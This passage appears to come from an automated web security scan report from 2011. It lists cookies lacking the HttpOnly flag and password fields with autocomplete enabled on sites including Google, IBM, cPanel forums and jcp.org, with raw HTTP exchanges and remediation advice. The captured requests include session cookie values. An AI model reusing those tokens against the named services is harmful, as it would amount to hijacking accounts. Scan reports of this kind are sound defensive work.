GET /sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg&id=12944662591677844831&captcha=marbi&submit=Submit HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/sorry/?continue=http://www.google.com/search%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2,or.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=yriFazr4YzG_-3ugE2lAyg

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=VHoVg_3qij9Moc_LhqQwIQ; path=/; domain=.google.com
Date: Sat, 17 Sep 2011 00:25:50 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3802
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?s?pq=windows+virtual
...[SNIP]...

12.266. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CYVZS-KNzTui_NOmziAL9mtyOCOKlphnSpIPoF7Pa6RkIABABKAJQ1fmN0gdgyQagAY2Fhv8DyAEBqgQWT9BRNmJLHDwQC7T3P1d18ThKSYzU5Q&ggladgrp=18232130056860973656&gglcreat=15258326341364818858&ved=0CAgQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiw2B0XnyR8ViABKAAw88uL57LFh-j1ATjy4fjyBECg683zBA&sig=AOD64_34k8ohP1rrb_mlNip7BAj1e1e6tw&adurl=http://www.giganews.com/s/google/nntp_variations%2520GN-EN-S-ZZ-bc-nntp_server-exact HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=Cm9DWVZaUy1LTnpUdWlfTk9temlBTDltdHlPQ09LbHBoblNwSVBvRjdQYTZSa0lBQkFCS0FKUTFmbU4wZ2RneVFhZ0FZMkZodjhEeUFFQnFnUVdUOUJSTm1KTEhEd1FDN1QzUDFkMThUaEtTWXpVNVESEwjzsJXKwKKrAhUIdIMKHf45Eo4YASCXjsnH3NKE4U1IAQ; expires=Sun, 16-Oct-2011 19:31:13 GMT; path=/pagead/conversion/1071743629/
Cache-Control: private
Location: http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact?gclid=CPOwlcrAoqsCFQh0gwod_jkSjg
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:31:13 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


12.267. http://www.ibm.com/search/csass/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf HTTP/1.1
Host: www.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/search.cgi?WORDS=xss&HOW=AND&FILTER=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; conxnsCookie=en; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/search.cgi%3FWORDS%3Dxss%26HOW%3DAND%26FILTER%3D

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:51:07 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-exZRJ0FVps8QQNazR5OTCf7rkg1rT8CzRDRn+2Ggk7E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 54728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Assign pageType -->


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999
...[SNIP]...

12.268. http://www.ibm.com/search/csass/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:34 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...

12.269. http://www.mailtraq.com/30day  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailtraq.com
Path:   /30day

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /30day HTTP/1.1
Host: www.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/imap
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200
Cache-Control: private
Connection: close
Date: Fri, 16 Sep 2011 19:49:48 GMT
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: 6464-query=; path=/; HttpOnly;
Set-Cookie: 6464%2Dformreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fimap; path=/
Set-Cookie: 6464%2Duserid=%2D3712022; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27682

<html><head><!-- Google Website Optimizer Tracking Script -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['gwo._setAccount', 'UA-19482991-2']);
_gaq.push(['gwo._trackPagevi
...[SNIP]...

12.270. http://www.nntpserver.com/gl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nntpserver.com
Path:   /gl/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gl/ HTTP/1.1
Host: www.nntpserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LastVisit=1316201507; expires=Sat, 15-Sep-2012 19:31:47 GMT; path=/; domain=.nntpserver.com
Set-Cookie: LastVisitTemp=deleted; expires=Thu, 16-Sep-2010 19:31:46 GMT; path=/; domain=.nntpserver.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


12.271. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive2.com
Path:   /89/Visitor/vTracker_v2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /89/Visitor/vTracker_v2.asp?websiteid=0&groupid=89 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 8620
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: wsa=cookiedetect=True&pagesvisited%5F0=2&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N; path=/89
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:25:56 GMT


//alert('False');


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what brows
...[SNIP]...

13. Password field with autocomplete enabled  previous  next
There are 35 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


13.1. http://dw1.s81c.com/common/js/dynamicnav.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dw1.s81c.com
Path:   /common/js/dynamicnav.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /common/js/dynamicnav.js HTTP/1.1
Host: dw1.s81c.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 02 Sep 2010 13:02:39 GMT
ETag: "1421b-6dc5b9c0"
Accept-Ranges: bytes
Cteonnt-Length: 82459
epKe-Alive: timeout=10, max=63
Content-Type: application/x-javascript
Content-Length: 82459
Cache-Control: max-age=86400
Expires: Sat, 17 Sep 2011 19:55:06 GMT
Date: Fri, 16 Sep 2011 19:55:06 GMT
Connection: close
Vary: Accept-Encoding

if(typeof IOL=="undefined"||IOL==null){var IOL={}}if(typeof PMM=="undefined"||PMM==null){var PMM={}}if(typeof WEBSIGNIN=="undefined"||WEBSIGNIN==null){var WEBSIGNIN={}}var userstate;var ibmWebSigninRe
...[SNIP]...
</p>';if(B==true){A+='<form action="'+WEBSIGNIN.path.PKMS+'" id="userForm" onsubmit="ibmCommonDynamicNavLayerChk(this, \'ssoFPath\'); return false;" method="post">'
}else{A+='<form id="userForm" method="post" name="userForm" onsubmit="return false">
...[SNIP]...
</label><input type="password" value="" size="25" id="password" name="password" maxlength="31"/><input type="hidden" name="login-form-type" value="pwd" />
...[SNIP]...

13.2. http://forums.cpanel.net/calendar.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /calendar.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /calendar.php HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.2.10.1316220231; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:39 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:50:40 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:50:39 GMT; path=/
Content-Length: 39506
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

13.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /f43/connection-imap-server-failed-96021.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /f43/connection-imap-server-failed-96021.html HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:42:54 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:42:53 GMT; path=/
Content-Length: 99145
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
           <form id="navbar_loginform" action="http://forums.cpanel.net/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

13.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jcp.org
Path:   /aboutJava/communityprocess/maintenance/jsr234/index2.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /aboutJava/communityprocess/maintenance/jsr234/index2.html HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=234

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:56 GMT
Content-type: text/html
Content-Length: 17825

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>


<!------------------------------->
<!-- ABOUT THIS HTML -->
<!------------------------------->
<!-- FOLLOW THESE COMMENTS FO
...[SNIP]...
<img src="/images/hd_my-jcp.gif" alt="My JCP" height="18" width="150">


<form name="login" method="post" action="/en/user/login" >
<input name="uri" value="/en/home/index" type="hidden">
...[SNIP]...
<td><input type="password" name="password" style="width:52px" value="" onKeyPress="return handle_keypress(this, event)"></
td>
...[SNIP]...

13.5. http://jcp.org/en/jsr/all  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jcp.org
Path:   /en/jsr/all

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/jsr/all HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:59 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 411003


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>



...[SNIP]...
<img src="/images/hd_my-jcp.gif" alt="My JCP" height="18" width="150">


<form name="login" method="post" action="https://jcp.org/en/user/login" >
    <input name="uri" value="/en/jsr/all" type="hidden">
...[SNIP]...
<td><input type="password" name="password" style="width:52px" class="form" value="" onkeypress="return handle_keypress(this, event)"></td>
...[SNIP]...

13.6. http://www.actvalue.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:04 GMT
Content-Length: 42041

<html><head><title>ActValue Consulting &#38; Solutions - Servizi di consulenza e Information Technology - progettazione, realizzazione ed integrazione di tecnologie RFId - Sviluppo e commercializzazio
...[SNIP]...
<tr><FORM id=form4 name=form4
action=/pages/asp/general/login.asp method=post>
<td>
...[SNIP]...
<p align="center"><INPUT type=password name=p></p>
...[SNIP]...

13.7. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /pages/asp/editorial/ps_rfid.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSRBDSBS=MIBFIBDBGCMIPOEOIPCEIHHM

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:36 GMT
Content-Length: 33643

<html><head><title>Tecnologia RFId - Radio Frequency Identification - Tecnologia attiva e passiva - Componenti principali: trasponder (tag), antenna, middleware</title><meta http-equiv="X-UA-Compatibl
...[SNIP]...
<tr><FORM id=form4 name=form4
action=/pages/asp/general/login.asp method=post>
<td>
...[SNIP]...
<p align="center"><INPUT type=password name=p></p>
...[SNIP]...

13.8. http://www.easynews.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.easynews.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?gclid=CJzUx83AoqsCFRdlgwod-2urfQ HTTP/1.1
Host: www.easynews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:22 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 19:31:22 GMT
Content-Type: text/html
Content-Length: 48871

